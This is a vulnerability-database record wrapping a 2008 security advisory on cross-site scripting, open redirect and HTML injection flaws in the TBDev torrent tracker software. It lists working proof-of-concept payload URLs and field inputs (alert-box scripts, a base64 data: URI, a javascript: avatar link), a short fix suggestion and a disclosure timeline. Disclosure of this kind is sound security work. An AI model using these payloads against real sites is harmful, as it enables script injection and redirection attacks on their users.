{"href": "https://www.seebug.org/vuldb/ssvid-12958", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-06-12T00:00:00", "title": "TBDev 01-01-2008 Multiple Remote Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12958", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2009-06-12T00:00:00", "sourceData": "\n TBDev - Cross Site Scripting and HTML Injection Vulnerabilities\n\nVersion Affected: 01-01-2008 (16th January 2008) (newest)\n\nInfo: TBDEV.NET is a project to further enhance, update and develop a\nsoftware (php peer-to-peer) from the original torrentbits/bytemonsoon\nsource code.\n\nCredits: InterN0T\n\nExternal Links:\nhttp://www.tbdev.net\n\n\n-:: The Advisory ::-\n\nVulnerable Function / ID Calls:\nreturnto\n\nCross Site Scripting: (Sysops / Mods Only!)\nhttp://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script>\nhttp://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script>alert(0)</script><br\n\nCross Site Script Redirection: (Sysops / Mods Only!)\nhttp://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1\n\nCross Site Script Redirection: (Anyone, the enduser will need to log in\nthough)\nhttp://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]\nhttp://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\n\nHTML Injection:\n1) http://[HOST]/tbdev/tbdev-01-01-08/my.php\n-- Info field: </textarea><script>alert(0)</script> << is reflected\nlocally only!\n\n2) http://[HOST]/tbdev/tbdev-01-01-08/my.php\n-- Avatar field: javascript:alert(0)\n\n2b) Affected Sites by HTML Injection:\nhttp://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID\n\nInternet Explorer 6 and perhaps 7 should be triggered by this.\nPlease see: 
http://ha.ckers.org/xss.html for more information.\nBrowser Tested: Internet Explorer 7 (Firefox 3 was tested for the other\nvulnerabilities)\n\n-:: Solution ::-\nSecure redirection calls with referer headers (just an example) and\nfilter bad characters.\n\nConclusion:\nThis system was fun to find bad code in, it sure had a nice diversity of\nvulnerabilities.\n\nReference:\nhttp://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html\n\nDisclosure Information:\n- Vulnerabilities found, researched and confirmed between 5th and 10th June.\n- Advisory finished and published on InterN0T the 12th June.\n- Vendor and Bugtraq (SecurityFocus) contacted the 12th June.\n\n\nAll of the best,\nMaXe\n\n# sebug.net\n\n ", "id": "SSV:12958", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:52:01", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647736761}}